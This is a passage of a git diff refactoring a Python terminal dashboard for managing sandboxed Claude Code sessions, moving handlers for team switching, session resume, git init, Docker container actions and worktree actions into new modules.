_handle_team_switch, + _handle_worktree_action_menu, + _handle_worktree_start, + _prepare_for_nested_ui, + _show_onboarding_banner, +) + +__all__ = [ + "_apply_event", + "_handle_clone", + "_handle_container_action_menu", + "_handle_container_remove", + "_handle_container_resume", + "_handle_container_stop", + "_handle_create_worktree", + "_handle_git_init", + "_handle_profile_menu", + "_handle_recent_workspaces", + "_handle_sandbox_import", + "_handle_session_action_menu", + "_handle_session_resume", + "_handle_settings", + "_handle_start_flow", + "_handle_statusline_install", + "_handle_team_switch", + "_handle_worktree_action_menu", + "_handle_worktree_start", + "_prepare_for_nested_ui", + "_resolve_tab", + "_run_effect", + "_show_onboarding_banner", + "run_dashboard", +] + def _format_last_used(iso_timestamp: str) -> str: try: @@ -79,6 +120,7 @@ def run_dashboard() -> None: - VerboseToggleRequested: Toggle verbose worktree status display """ from ... import config as scc_config + from ... import sessions # Show one-time onboarding banner for new users if not scc_config.has_seen_onboarding(): @@ -355,1135 +397,3 @@ def _run_effect(effect: app_dashboard.DashboardEffect) -> object: return _handle_worktree_action_menu(effect.worktree_path) msg = f"Unsupported dashboard effect: {effect}" raise ValueError(msg) - - -def _prepare_for_nested_ui(console: Console) -> None: - """Prepare terminal state for launching nested UI components. - - Restores cursor visibility, ensures clean newline, and flushes - any buffered input to prevent ghost keypresses from Rich Live context. - - This should be called before launching any interactive picker or wizard - from the dashboard to ensure clean terminal state. - - Args: - console: Rich Console instance for terminal operations. - """ - import io - import sys - - # Restore cursor (Rich Live may hide it) - console.show_cursor(True) - console.print() # Ensure clean newline - - # Flush buffered input (best-effort, Unix only) - try: - import termios - - termios.tcflush(sys.stdin.fileno(), termios.TCIFLUSH) - except ( - ModuleNotFoundError, # Windows - no termios module - OSError, # Redirected stdin, no TTY - ValueError, # Invalid file descriptor - TypeError, # Mock stdin without fileno - io.UnsupportedOperation, # Stdin without fileno support - ): - pass # Non-Unix or non-TTY environment - safe to ignore - - -def _handle_team_switch() -> None: - """Handle team switch request from dashboard. - - Shows the team picker and switches team if user selects one. - """ - from ... import config, teams - from ..picker import pick_team - - console = get_err_console() - _prepare_for_nested_ui(console) - - try: - # Load config and org config for team list - cfg = config.load_user_config() - org_config = config.load_cached_org_config() - - available_teams = teams.list_teams(org_config) - if not available_teams: - print_with_layout(console, "[yellow]No teams available[/yellow]", max_width=120) - return - - # Get current team for marking - current_team = cfg.get("selected_profile") - - selected = pick_team( - available_teams, - current_team=str(current_team) if current_team else None, - title="Switch Team", - ) - - if selected: - # Update team selection - team_name = selected.get("name", "") - cfg["selected_profile"] = team_name - config.save_user_config(cfg) - print_with_layout( - console, - f"[green]Switched to team: {team_name}[/green]", - max_width=120, - ) - # If cancelled, just return to dashboard - - except TeamSwitchRequested: - # Nested team switch (shouldn't happen, but handle gracefully) - pass - except Exception as e: - print_with_layout( - console, - f"[red]Error switching team: {e}[/red]", - max_width=120, - ) - - -def _handle_start_flow(reason: str) -> app_dashboard.StartFlowResult: - """Handle start flow request from dashboard.""" - from ...commands.launch import run_start_wizard_flow - - console = get_err_console() - _prepare_for_nested_ui(console) - - # Handle worktree-specific start (Enter on worktree in details pane) - if reason.startswith("worktree:"): - worktree_path = reason[9:] # Remove "worktree:" prefix - return _handle_worktree_start(worktree_path) - - # For empty-state starts, skip Quick Resume (user intent is "create new") - skip_quick_resume = reason in ("no_containers", "no_sessions") - - # Show contextual message based on reason - if reason == "no_containers": - print_with_layout(console, "[dim]Starting a new session...[/dim]") - elif reason == "no_sessions": - print_with_layout(console, "[dim]Starting your first session...[/dim]") - console.print() - - # Run the wizard with allow_back=True for dashboard context - # Returns: True (success), False (Esc/back), None (q/quit) - result = run_start_wizard_flow(skip_quick_resume=skip_quick_resume, allow_back=True) - return app_dashboard.StartFlowResult.from_legacy(result) - - -def _handle_worktree_start(worktree_path: str) -> app_dashboard.StartFlowResult: - """Handle starting a session in a specific worktree.""" - from pathlib import Path - - from rich.status import Status - - from ... import config, docker - from ...application.start_session import ( - StartSessionDependencies, - StartSessionRequest, - sync_marketplace_settings_for_start, - ) - from ...bootstrap import get_default_adapters - from ...commands.launch import ( - _launch_sandbox, - _resolve_mount_and_branch, - _validate_and_resolve_workspace, - ) - from ...commands.launch.team_settings import _configure_team_settings - from ...marketplace.materialize import materialize_marketplace - from ...marketplace.resolve import resolve_effective_config - from ...theme import Spinners - - console = get_err_console() - - workspace_path = Path(worktree_path) - workspace_name = workspace_path.name - - # Validate workspace exists - if not workspace_path.exists(): - console.print(f"[red]Worktree no longer exists: {worktree_path}[/red]") - return app_dashboard.StartFlowResult.from_legacy(False) - - console.print(f"[cyan]Starting session in:[/cyan] {workspace_name}") - console.print() - - try: - # Docker availability check - with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): - docker.check_docker_available() - - # Validate and resolve workspace - resolved_path = _validate_and_resolve_workspace(str(workspace_path)) - if resolved_path is None: - console.print("[red]Workspace validation failed[/red]") - return app_dashboard.StartFlowResult.from_legacy(False) - workspace_path = resolved_path - - # Get current team from config - cfg = config.load_user_config() - team = cfg.get("selected_profile") - _configure_team_settings(team, cfg) - - # Sync marketplace settings - adapters = get_default_adapters() - start_dependencies = StartSessionDependencies( - filesystem=adapters.filesystem, - remote_fetcher=adapters.remote_fetcher, - clock=adapters.clock, - git_client=adapters.git_client, - agent_runner=adapters.agent_runner, - sandbox_runtime=adapters.sandbox_runtime, - resolve_effective_config=resolve_effective_config, - materialize_marketplace=materialize_marketplace, - ) - start_request = StartSessionRequest( - workspace_path=workspace_path, - workspace_arg=str(workspace_path), - entry_dir=workspace_path, - team=team, - session_name=None, - resume=False, - fresh=False, - offline=False, - standalone=team is None, - dry_run=False, - allow_suspicious=False, - org_config=config.load_cached_org_config(), - org_config_url=None, - ) - sync_result, _sync_error = sync_marketplace_settings_for_start( - start_request, - start_dependencies, - ) - plugin_settings = sync_result.rendered_settings if sync_result else None - - # Resolve mount path and branch - mount_path, current_branch = _resolve_mount_and_branch(workspace_path) - - # Show session info - if team: - console.print(f"[dim]Team: {team}[/dim]") - if current_branch: - console.print(f"[dim]Branch: {current_branch}[/dim]") - console.print() - - # Launch sandbox - _launch_sandbox( - workspace_path=workspace_path, - mount_path=mount_path, - team=team, - session_name=None, # No specific session name - current_branch=current_branch, - should_continue_session=False, - fresh=False, - plugin_settings=plugin_settings, - ) - return app_dashboard.StartFlowResult.from_legacy(True) - - except KeyboardInterrupt: - console.print("\n[yellow]Cancelled[/yellow]") - return app_dashboard.StartFlowResult.from_legacy(False) - except Exception as e: - console.print(f"[red]Error starting session: {e}[/red]") - return app_dashboard.StartFlowResult.from_legacy(False) - - -def _handle_session_resume(session: SessionSummary) -> bool: - """Resume a Claude Code session from the dashboard. - - This function executes OUTSIDE Rich Live context (the dashboard has - already exited via the exception unwind before this is called). - - Args: - session: Session summary containing workspace, team, branch, container_name, etc. - - Returns: - True if session was resumed successfully, False if resume failed - (e.g., workspace no longer exists). - """ - - from pathlib import Path - - from rich.status import Status - - from ... import config, docker - from ...application.start_session import ( - StartSessionDependencies, - StartSessionRequest, - sync_marketplace_settings_for_start, - ) - from ...bootstrap import get_default_adapters - from ...commands.launch import ( - _launch_sandbox, - _resolve_mount_and_branch, - _validate_and_resolve_workspace, - ) - from ...commands.launch.team_settings import _configure_team_settings - from ...marketplace.materialize import materialize_marketplace - from ...marketplace.resolve import resolve_effective_config - from ...theme import Spinners - - console = get_err_console() - _prepare_for_nested_ui(console) - - # Extract session info - workspace = session.workspace - team = session.team # May be None for standalone - session_name = session.name - branch = session.branch - - if not workspace: - console.print("[red]Session has no workspace path[/red]") - return False - - # Validate workspace still exists - workspace_path = Path(workspace) - if not workspace_path.exists(): - console.print(f"[red]Workspace no longer exists: {workspace}[/red]") - console.print("[dim]The session may have been deleted or moved.[/dim]") - return False - - try: - # Docker availability check - with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): - docker.check_docker_available() - - # Validate and resolve workspace (we know it exists from earlier check) - resolved_path = _validate_and_resolve_workspace(str(workspace_path)) - if resolved_path is None: - console.print("[red]Workspace validation failed[/red]") - return False - workspace_path = resolved_path - - # Configure team settings - cfg = config.load_user_config() - _configure_team_settings(team, cfg) - - # Sync marketplace settings - adapters = get_default_adapters() - start_dependencies = StartSessionDependencies( - filesystem=adapters.filesystem, - remote_fetcher=adapters.remote_fetcher, - clock=adapters.clock, - git_client=adapters.git_client, - agent_runner=adapters.agent_runner, - sandbox_runtime=adapters.sandbox_runtime, - resolve_effective_config=resolve_effective_config, - materialize_marketplace=materialize_marketplace, - ) - start_request = StartSessionRequest( - workspace_path=workspace_path, - workspace_arg=str(workspace_path), - entry_dir=workspace_path, - team=team, - session_name=session_name, - resume=True, - fresh=False, - offline=False, - standalone=team is None, - dry_run=False, - allow_suspicious=False, - org_config=config.load_cached_org_config(), - org_config_url=None, - ) - sync_result, _sync_error = sync_marketplace_settings_for_start( - start_request, - start_dependencies, - ) - plugin_settings = sync_result.rendered_settings if sync_result else None - - # Resolve mount path and branch - mount_path, current_branch = _resolve_mount_and_branch(workspace_path) - - # Use session's stored branch if available (more accurate than detected) - if branch: - current_branch = branch - - # Show resume info - workspace_name = workspace_path.name - print_with_layout(console, f"[cyan]Resuming session:[/cyan] {workspace_name}") - if team: - print_with_layout(console, f"[dim]Team: {team}[/dim]") - if current_branch: - print_with_layout(console, f"[dim]Branch: {current_branch}[/dim]") - console.print() - - # Launch sandbox with resume flag - _launch_sandbox( - workspace_path=workspace_path, - mount_path=mount_path, - team=team, - session_name=session_name, - current_branch=current_branch, - should_continue_session=True, # Resume existing container - fresh=False, - plugin_settings=plugin_settings, - ) - return True - - except Exception as e: - console.print(f"[red]Error resuming session: {e}[/red]") - return False - - -def _handle_statusline_install() -> bool: - """Handle statusline installation request from dashboard. - - Installs the Claude Code statusline enhancement using the same logic - as `scc statusline`. Works cross-platform (Windows, macOS, Linux). - - Returns: - True if statusline was installed successfully, False otherwise. - """ - from rich.status import Status - - from ...commands.admin import install_statusline - from ...theme import Spinners - - console = get_err_console() - _prepare_for_nested_ui(console) - - console.print("[cyan]Installing statusline...[/cyan]") - console.print() - - try: - with Status( - "[cyan]Configuring statusline...[/cyan]", - console=console, - spinner=Spinners.DOCKER, - ): - result = install_statusline() - - if result: - console.print("[green]✓ Statusline installed successfully![/green]") - console.print("[dim]Press any key to continue...[/dim]") - else: - console.print("[yellow]Statusline installation completed with warnings[/yellow]") - - return result - - except Exception as e: - console.print(f"[red]Error installing statusline: {e}[/red]") - return False - - -def _handle_recent_workspaces() -> str | None: - """Handle recent workspaces picker from dashboard. - - Shows a picker with recently used workspaces, allowing the user to - quickly navigate to a previous project. - - Returns: - Path of selected workspace, or None if cancelled. - """ - from ...contexts import load_recent_contexts - from ..picker import pick_context - - console = get_err_console() - _prepare_for_nested_ui(console) - - try: - recent = load_recent_contexts() - if not recent: - console.print("[yellow]No recent workspaces found[/yellow]") - console.print( - "[dim]Start a session with `scc start ` to populate this list.[/dim]" - ) - return None - - selected = pick_context( - recent, - title="Recent Workspaces", - subtitle="Select a workspace", - ) - - if selected: - return str(selected.worktree_path) - return None - - except Exception as e: - console.print(f"[red]Error loading recent workspaces: {e}[/red]") - return None - - -def _handle_git_init() -> bool: - """Handle git init request from dashboard. - - Initializes a new git repository in the current directory, - optionally creating an initial commit. - - Returns: - True if git was initialized successfully, False otherwise. - """ - import os - import subprocess - - console = get_err_console() - _prepare_for_nested_ui(console) - - cwd = os.getcwd() - console.print(f"[cyan]Initializing git repository in:[/cyan] {cwd}") - console.print() - - try: - # Run git init - result = subprocess.run( - ["git", "init"], - cwd=cwd, - capture_output=True, - text=True, - check=True, - ) - console.print(f"[green]✓ {result.stdout.strip()}[/green]") - - # Optionally create initial commit - console.print() - console.print("[dim]Creating initial empty commit...[/dim]") - - # Try to create an empty commit - try: - subprocess.run( - ["git", "commit", "--allow-empty", "-m", "Initial commit"], - cwd=cwd, - capture_output=True, - text=True, - check=True, - ) - console.print("[green]✓ Initial commit created[/green]") - except subprocess.CalledProcessError as e: - # May fail if git identity not configured - if "user.email" in e.stderr or "user.name" in e.stderr: - console.print("[yellow]Tip: Configure git identity to enable commits:[/yellow]") - console.print(" git config user.name 'Your Name'") - console.print(" git config user.email 'your@email.com'") - else: - console.print( - f"[yellow]Could not create initial commit: {e.stderr.strip()}[/yellow]" - ) - - console.print() - console.print("[dim]Press any key to continue...[/dim]") - return True - - except subprocess.CalledProcessError as e: - console.print(f"[red]Git init failed: {e.stderr.strip()}[/red]") - return False - except FileNotFoundError: - console.print("[red]Git is not installed or not in PATH[/red]") - return False - - -def _handle_create_worktree() -> bool: - """Handle create worktree request from dashboard. - - Prompts for a worktree name and creates a new git worktree. - - Returns: - True if worktree was created successfully, False otherwise. - """ - console = get_err_console() - _prepare_for_nested_ui(console) - - console.print("[cyan]Create new worktree[/cyan]") - console.print() - console.print("[dim]Use `scc worktree create ` from the terminal for full options.[/dim]") - console.print("[dim]Press any key to continue...[/dim]") - - # For now, just inform user of CLI option - # Full interactive creation can be added in a future phase - return False - - -def _handle_clone() -> bool: - """Handle clone request from dashboard. - - Informs user how to clone a repository. - - Returns: - True if clone was successful, False otherwise. - """ - console = get_err_console() - _prepare_for_nested_ui(console) - - console.print("[cyan]Clone a repository[/cyan]") - console.print() - console.print("[dim]Use `git clone ` to clone a repository, then run `scc` in it.[/dim]") - console.print("[dim]Press any key to continue...[/dim]") - - # For now, just inform user of git clone option - # Full interactive clone can be added in a future phase - return False - - -def _handle_container_stop(container_id: str, container_name: str) -> tuple[bool, str | None]: - """Stop a container from the dashboard.""" - from rich.status import Status - - from ... import docker - from ...theme import Spinners - - console = get_err_console() - _prepare_for_nested_ui(console) - - status = docker.get_container_status(container_name) - if status and status.startswith("Up") is False: - return True, f"Already stopped: {container_name}" - - with Status( - f"[cyan]Stopping {container_name}...[/cyan]", - console=console, - spinner=Spinners.DOCKER, - ): - success = docker.stop_container(container_id) - - return success, (f"Stopped {container_name}" if success else f"Failed to stop {container_name}") - - -def _handle_container_resume(container_id: str, container_name: str) -> tuple[bool, str | None]: - """Resume a container from the dashboard.""" - from rich.status import Status - - from ... import docker - from ...theme import Spinners - - console = get_err_console() - _prepare_for_nested_ui(console) - - status = docker.get_container_status(container_name) - if status and status.startswith("Up"): - return True, f"Already running: {container_name}" - - with Status( - f"[cyan]Starting {container_name}...[/cyan]", - console=console, - spinner=Spinners.DOCKER, - ): - success = docker.resume_container(container_id) - - return success, ( - f"Resumed {container_name}" if success else f"Failed to resume {container_name}" - ) - - -def _handle_container_remove(container_id: str, container_name: str) -> tuple[bool, str | None]: - """Remove a stopped container from the dashboard.""" - from rich.status import Status - - from ... import docker - from ...theme import Spinners - - console = get_err_console() - _prepare_for_nested_ui(console) - - status = docker.get_container_status(container_name) - if status and status.startswith("Up"): - return False, f"Stop {container_name} before deleting" - - with Status( - f"[cyan]Removing {container_name}...[/cyan]", - console=console, - spinner=Spinners.DOCKER, - ): - success = docker.remove_container(container_name or container_id) - - return success, ( - f"Removed {container_name}" if success else f"Failed to remove {container_name}" - ) - - -def _handle_container_action_menu(container_id: str, container_name: str) -> str | None: - """Show a container actions menu and execute the selected action.""" - import subprocess - - from ... import docker - from ..list_screen import ListItem, ListScreen - - console = get_err_console() - _prepare_for_nested_ui(console) - - status = docker.get_container_status(container_name) or "" - is_running = status.startswith("Up") - - items: list[ListItem[str]] = [] - - if is_running: - items.append( - ListItem( - value="attach_shell", - label="Attach shell", - description="docker exec -it bash", - ) - ) - items.append( - ListItem( - value="stop", - label="Stop container", - description="Stop running container", - ) - ) - else: - items.append( - ListItem( - value="resume", - label="Resume container", - description="Start stopped container", - ) - ) - items.append( - ListItem( - value="delete", - label="Delete container", - description="Remove stopped container", - ) - ) - - if not items: - return "No actions available" - - screen = ListScreen(items, title=f"Actions — {container_name}") - selected = screen.run() - if not selected: - return "Cancelled" - - if selected == "attach_shell": - cmd = ["docker", "exec", "-it", container_name, "bash"] - result = subprocess.run(cmd) - return "Shell closed" if result.returncode == 0 else "Shell exited with errors" - - if selected == "stop": - _, message = _handle_container_stop(container_id, container_name) - return message - - if selected == "resume": - _, message = _handle_container_resume(container_id, container_name) - return message - - if selected == "delete": - _, message = _handle_container_remove(container_id, container_name) - return message - - return None - - -def _handle_session_action_menu(session: SessionSummary) -> str | None: - """Show a session actions menu and execute the selected action.""" - from ... import sessions as session_store - from ..list_screen import ListItem, ListScreen - - console = get_err_console() - _prepare_for_nested_ui(console) - - items: list[ListItem[str]] = [ - ListItem(value="resume", label="Resume session", description="Continue this session"), - ] - - items.append( - ListItem( - value="remove", - label="Remove from history", - description="Does not delete any containers", - ) - ) - - screen = ListScreen(items, title="Session Actions") - selected = screen.run() - if not selected: - return "Cancelled" - - if selected == "resume": - try: - success = _handle_session_resume(session) - return "Resumed session" if success else "Resume failed" - except Exception: - return "Resume failed" - - if selected == "remove": - workspace = session.workspace - branch = session.branch - if not workspace: - return "Missing workspace" - removed = session_store.remove_session(workspace, branch) - return "Removed from history" if removed else "No matching session found" - - return None - - -def _handle_worktree_action_menu(worktree_path: str) -> str | None: - """Show a worktree actions menu and execute the selected action.""" - import subprocess - from pathlib import Path - - from ..list_screen import ListItem, ListScreen - - console = get_err_console() - _prepare_for_nested_ui(console) - - items: list[ListItem[str]] = [ - ListItem(value="start", label="Start session here", description="Launch Claude"), - ListItem( - value="open_shell", - label="Open shell", - description="cd into this worktree", - ), - ListItem( - value="remove", - label="Remove worktree", - description="git worktree remove ", - ), - ] - - screen = ListScreen(items, title=f"Worktree Actions — {Path(worktree_path).name}") - selected = screen.run() - if not selected: - return "Cancelled" - - if selected == "start": - # Reuse worktree start flow directly - result = _handle_worktree_start(worktree_path) - if result.decision is app_dashboard.StartFlowDecision.QUIT: - return "Cancelled" - if result.decision is app_dashboard.StartFlowDecision.LAUNCHED: - return "Started session" - return "Start cancelled" - - if selected == "open_shell": - console.print(f"[cyan]cd {worktree_path}[/cyan]") - console.print("[dim]Copy/paste to jump into this worktree.[/dim]") - return "Path copied to screen" - - if selected == "remove": - if not Confirm.ask( - "[yellow]Remove this worktree? This cannot be undone.[/yellow]", - default=False, - ): - return "Cancelled" - try: - subprocess.run(["git", "worktree", "remove", "--force", worktree_path], check=True) - return "Worktree removed" - except Exception: - return "Failed to remove worktree" - - return None - - -def _handle_settings() -> str | None: - """Handle settings and maintenance screen request from dashboard. - - Shows the settings and maintenance TUI, allowing users to perform - maintenance operations like clearing cache, pruning sessions, etc. - - Returns: - Success message string if an action was performed, None if cancelled. - """ - from ..settings import run_settings_screen - - console = get_err_console() - _prepare_for_nested_ui(console) - - try: - return run_settings_screen() - except Exception as e: - console.print(f"[red]Error in settings screen: {e}[/red]") - return None - - -def _handle_profile_menu() -> str | None: - """Handle profile quick menu request from dashboard. - - Shows a quick menu with profile actions: save, apply, diff, settings. - - Returns: - Success message string if an action was performed, None if cancelled. - """ - from pathlib import Path - - from ..list_screen import ListItem, ListScreen - - console = get_err_console() - _prepare_for_nested_ui(console) - - items: list[ListItem[str]] = [ - ListItem( - value="save", - label="Save current settings", - description="Capture workspace settings to profile", - ), - ListItem( - value="apply", - label="Apply saved profile", - description="Restore settings from profile", - ), - ListItem( - value="diff", - label="Show diff", - description="Compare profile vs workspace", - ), - ListItem( - value="settings", - label="Open in Settings", - description="Full profile management", - ), - ] - - screen = ListScreen(items, title="[cyan]Profile[/cyan]") - selected = screen.run() - - if not selected: - return None - - # Import profile functions - from ...core.personal_profiles import ( - compute_fingerprints, - load_personal_profile, - load_workspace_mcp, - load_workspace_settings, - merge_personal_mcp, - merge_personal_settings, - save_applied_state, - save_personal_profile, - write_workspace_mcp, - write_workspace_settings, - ) - - workspace = Path.cwd() - - if selected == "save": - try: - settings = load_workspace_settings(workspace) - mcp = load_workspace_mcp(workspace) - save_personal_profile(workspace, settings, mcp) - return "Profile saved" - except Exception as e: - console.print(f"[red]Save failed: {e}[/red]") - return "Profile save failed" - - if selected == "apply": - profile = load_personal_profile(workspace) - if not profile: - console.print("[yellow]No profile saved for this workspace[/yellow]") - return "No profile to apply" - try: - # Load current workspace settings - current_settings = load_workspace_settings(workspace) or {} - current_mcp = load_workspace_mcp(workspace) or {} - - # Merge profile into workspace - if profile.settings: - merged_settings = merge_personal_settings( - workspace, current_settings, profile.settings - ) - write_workspace_settings(workspace, merged_settings) - - if profile.mcp: - merged_mcp = merge_personal_mcp(current_mcp, profile.mcp) - write_workspace_mcp(workspace, merged_mcp) - - # Update applied state - fingerprints = compute_fingerprints(workspace) - save_applied_state(workspace, profile.profile_id, fingerprints) - - return "Profile applied" - except Exception as e: - console.print(f"[red]Apply failed: {e}[/red]") - return "Profile apply failed" - - if selected == "diff": - profile = load_personal_profile(workspace) - if not profile: - console.print("[yellow]No profile saved for this workspace[/yellow]") - return "No profile to compare" - - # Show structured diff overlay - from rich import box - from rich.panel import Panel - - from ...core.personal_profiles import ( - compute_structured_diff, - load_workspace_mcp, - load_workspace_settings, - ) - - current_settings = load_workspace_settings(workspace) or {} - current_mcp = load_workspace_mcp(workspace) or {} - - diff = compute_structured_diff( - workspace_settings=current_settings, - profile_settings=profile.settings, - workspace_mcp=current_mcp, - profile_mcp=profile.mcp, - ) - - if diff.is_empty: - console.print("[green]✓ Profile is in sync with workspace[/green]") - return "Profile in sync" - - # Build diff content - lines: list[str] = [] - current_section = "" - indicators = { - "added": "[green]+[/green]", - "removed": "[red]−[/red]", - "modified": "[yellow]~[/yellow]", - } - section_names = { - "plugins": "plugins", - "mcp_servers": "mcp_servers", - "marketplaces": "marketplaces", - } - - for item in diff.items[:12]: # Smart fallback: limit to 12 items - if item.section != current_section: - if current_section: - lines.append("") - lines.append(f" [bold]{section_names.get(item.section, item.section)}[/bold]") - current_section = item.section - indicator = indicators.get(item.status, " ") - modifier = " [dim](modified)[/dim]" if item.status == "modified" else "" - lines.append(f" {indicator} {item.name}{modifier}") - - if diff.total_count > 12: - lines.append("") - lines.append(f" [dim]+ {diff.total_count - 12} more...[/dim]") - - lines.append("") - lines.append(f" [dim]{diff.total_count} difference(s)[/dim]") - - console.print() - console.print( - Panel( - "\n".join(lines), - title="[bold]Profile Diff[/bold]", - border_style="bright_black", - box=box.ROUNDED, - padding=(1, 2), - ) - ) - return "Diff shown" - - if selected == "settings": - # Open settings TUI on Profiles tab - from ..settings import run_settings_screen - - return run_settings_screen(initial_category="PROFILES") - - return None - - -def _handle_sandbox_import() -> str | None: - """Handle sandbox plugin import request from dashboard. - - Detects plugins installed in the sandbox but not in the workspace settings, - and prompts the user to import them. - - Returns: - Success message string if imports were made, None if cancelled or no imports. - """ - import os - from pathlib import Path - - from ...core.personal_profiles import ( - compute_sandbox_import_candidates, - load_workspace_settings, - merge_sandbox_imports, - write_workspace_settings, - ) - from ...docker.launch import get_sandbox_settings - - console = get_err_console() - _prepare_for_nested_ui(console) - - workspace = Path(os.getcwd()) - - # Get current workspace settings - workspace_settings = load_workspace_settings(workspace) or {} - - # Get sandbox settings from Docker volume - console.print("[dim]Checking sandbox for plugin changes...[/dim]") - sandbox_settings = get_sandbox_settings() - - if not sandbox_settings: - console.print("[yellow]No sandbox settings found.[/yellow]") - console.print("[dim]Start a session first to create sandbox settings.[/dim]") - return None - - # Compute what's in sandbox but not in workspace - missing_plugins, missing_marketplaces = compute_sandbox_import_candidates( - workspace_settings, sandbox_settings - ) - - if not missing_plugins and not missing_marketplaces: - console.print("[green]✓ No new plugins to import.[/green]") - console.print("[dim]Workspace is in sync with sandbox.[/dim]") - return "No imports needed" - - # Show preview of what will be imported - console.print() - console.print("[yellow]Sandbox plugins available for import:[/yellow]") - if missing_plugins: - for plugin in missing_plugins: - console.print(f" [cyan]+[/cyan] {plugin}") - if missing_marketplaces: - for name in sorted(missing_marketplaces.keys()): - console.print(f" [cyan]+[/cyan] marketplace: {name}") - console.print() - - # Confirm import - if not Confirm.ask("Import these into workspace settings?", default=True): - return None - - # Merge and write to workspace settings - try: - merged_settings = merge_sandbox_imports( - workspace_settings, missing_plugins, missing_marketplaces - ) - write_workspace_settings(workspace, merged_settings) - - total = len(missing_plugins) + len(missing_marketplaces) - console.print(f"[green]✓ Imported {total} item(s) to workspace settings.[/green]") - return f"Imported {total} plugin(s)" - - except Exception as e: - console.print(f"[red]Import failed: {e}[/red]") - return "Import failed" - - -def _show_onboarding_banner() -> None: - """Show one-time onboarding banner for new users. - - Displays a brief tip about `scc worktree enter` as the recommended - way to switch worktrees without shell configuration. - - Waits for user to press any key before continuing. - """ - import readchar - from rich import box - from rich.panel import Panel - - console = get_err_console() - - # Create a compact onboarding message - message = ( - "[bold cyan]Welcome to SCC![/bold cyan]\n\n" - "[yellow]Tip:[/yellow] Use [bold]scc worktree enter[/bold] to switch worktrees.\n" - "No shell setup required — just type [dim]exit[/dim] to return.\n\n" - "[dim]Press [bold]?[/bold] anytime for help, or any key to continue...[/dim]" - ) - - console.print() - print_with_layout( - console, - Panel( - message, - title="[bold]Getting Started[/bold]", - border_style="bright_black", - box=box.ROUNDED, - padding=(1, 2), - ), - max_width=120, - constrain=True, - ) - console.print() - - # Wait for any key - readchar.readkey() diff --git a/src/scc_cli/ui/dashboard/orchestrator_container_actions.py b/src/scc_cli/ui/dashboard/orchestrator_container_actions.py new file mode 100644 index 0000000..75fa0fd --- /dev/null +++ b/src/scc_cli/ui/dashboard/orchestrator_container_actions.py @@ -0,0 +1,114 @@ +"""Container action handlers for the dashboard orchestrator. + +Extracted from orchestrator_handlers.py to keep that module below the +800-line threshold. Every function follows the same pattern used by the +other handler helpers: get the Rich console, prepare for nested UI, +execute, and return ``(success, message)`` tuples. +""" + +from __future__ import annotations + +from typing import TYPE_CHECKING + +from ...console import get_err_console + +if TYPE_CHECKING: + from rich.console import Console + + +def _prepare_for_nested_ui(console: Console) -> None: + """Prepare terminal state for nested UI (thin copy — delegates to same logic).""" + import io + import sys + + console.show_cursor(True) + console.print() + + try: + import termios + + termios.tcflush(sys.stdin.fileno(), termios.TCIFLUSH) + except ( + ModuleNotFoundError, + OSError, + ValueError, + TypeError, + io.UnsupportedOperation, + ): + pass + + +def _handle_container_stop(container_id: str, container_name: str) -> tuple[bool, str | None]: + """Stop a container from the dashboard.""" + from rich.status import Status + + from ... import docker + from ...theme import Spinners + + console = get_err_console() + _prepare_for_nested_ui(console) + + status = docker.get_container_status(container_name) + if status and status.startswith("Up") is False: + return True, f"Already stopped: {container_name}" + + with Status( + f"[cyan]Stopping {container_name}...[/cyan]", + console=console, + spinner=Spinners.DOCKER, + ): + success = docker.stop_container(container_id) + + return success, (f"Stopped {container_name}" if success else f"Failed to stop {container_name}") + + +def _handle_container_resume(container_id: str, container_name: str) -> tuple[bool, str | None]: + """Resume a container from the dashboard.""" + from rich.status import Status + + from ... import docker + from ...theme import Spinners + + console = get_err_console() + _prepare_for_nested_ui(console) + + status = docker.get_container_status(container_name) + if status and status.startswith("Up"): + return True, f"Already running: {container_name}" + + with Status( + f"[cyan]Starting {container_name}...[/cyan]", + console=console, + spinner=Spinners.DOCKER, + ): + success = docker.resume_container(container_id) + + return success, ( + f"Resumed {container_name}" if success else f"Failed to resume {container_name}" + ) + + +def _handle_container_remove(container_id: str, container_name: str) -> tuple[bool, str | None]: + """Remove a stopped container from the dashboard.""" + from rich.status import Status + + from ... import docker + from ...theme import Spinners + + console = get_err_console() + _prepare_for_nested_ui(console) + + status = docker.get_container_status(container_name) + if status and status.startswith("Up"): + return False, f"Stop {container_name} before deleting" + + with Status( + f"[cyan]Removing {container_name}...[/cyan]", + console=console, + spinner=Spinners.DOCKER, + ): + success = docker.remove_container(container_name or container_id) + + return success, ( + f"Removed {container_name}" if success else f"Failed to remove {container_name}" + ) diff --git a/src/scc_cli/ui/dashboard/orchestrator_handlers.py b/src/scc_cli/ui/dashboard/orchestrator_handlers.py new file mode 100644 index 0000000..c3bf0df --- /dev/null +++ b/src/scc_cli/ui/dashboard/orchestrator_handlers.py @@ -0,0 +1,889 @@ +"""Handler functions for dashboard orchestrator effects. + +Extracted from orchestrator.py to keep that module focused on the +dashboard event loop and flow state management. These functions execute +OUTSIDE the Rich Live context after an intent exception unwinds. + +All handlers follow the same pattern: +1. Get err console +2. Prepare terminal for nested UI +3. Execute the handler logic +4. Return result for apply_dashboard_effect_result +""" + +from __future__ import annotations + +from typing import TYPE_CHECKING + +from scc_cli.application import dashboard as app_dashboard + +from ...confirm import Confirm +from ...console import get_err_console +from ..chrome import print_with_layout + +# ── Re-exports from orchestrator_container_actions.py ─────────────────────── +from .orchestrator_container_actions import ( # noqa: F401 + _handle_container_remove, + _handle_container_resume, + _handle_container_stop, +) + +# ── Re-exports from orchestrator_menus.py (preserve test-patch targets) ───── +from .orchestrator_menus import ( # noqa: F401 + _handle_profile_menu, + _handle_sandbox_import, + _handle_settings, + _show_onboarding_banner, +) + +if TYPE_CHECKING: + from rich.console import Console + + from scc_cli.ports.session_models import SessionSummary + + +def _prepare_for_nested_ui(console: Console) -> None: + """Prepare terminal state for launching nested UI components. + + Restores cursor visibility, ensures clean newline, and flushes + any buffered input to prevent ghost keypresses from Rich Live context. + + This should be called before launching any interactive picker or wizard + from the dashboard to ensure clean terminal state. + + Args: + console: Rich Console instance for terminal operations. + """ + import io + import sys + + # Restore cursor (Rich Live may hide it) + console.show_cursor(True) + console.print() # Ensure clean newline + + # Flush buffered input (best-effort, Unix only) + try: + import termios + + termios.tcflush(sys.stdin.fileno(), termios.TCIFLUSH) + except ( + ModuleNotFoundError, # Windows - no termios module + OSError, # Redirected stdin, no TTY + ValueError, # Invalid file descriptor + TypeError, # Mock stdin without fileno + io.UnsupportedOperation, # Stdin without fileno support + ): + pass # Non-Unix or non-TTY environment - safe 